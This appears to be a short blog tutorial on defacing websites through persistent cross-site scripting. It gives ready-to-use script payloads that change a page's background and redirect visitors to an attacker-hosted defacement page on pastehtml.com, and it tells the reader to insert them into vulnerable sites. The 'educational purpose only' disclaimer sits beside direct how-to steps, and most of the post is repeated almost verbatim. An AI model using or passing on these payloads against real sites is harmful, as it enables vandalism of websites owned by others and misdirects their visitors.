I explained how to do vulnerability test for XSS and some filter bypassing technique. Now let us see how a hacker deface a website with XSS vulnerability?
Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!
Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>
Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>
When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only persistent XSS vulnerable sites.
Never implement this technique. I am just explaining it for educational purpose only.
Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!
Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>
Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>
Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.com and get the link.When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only persistent XSS vulnerable sites.
No comments:
Post a Comment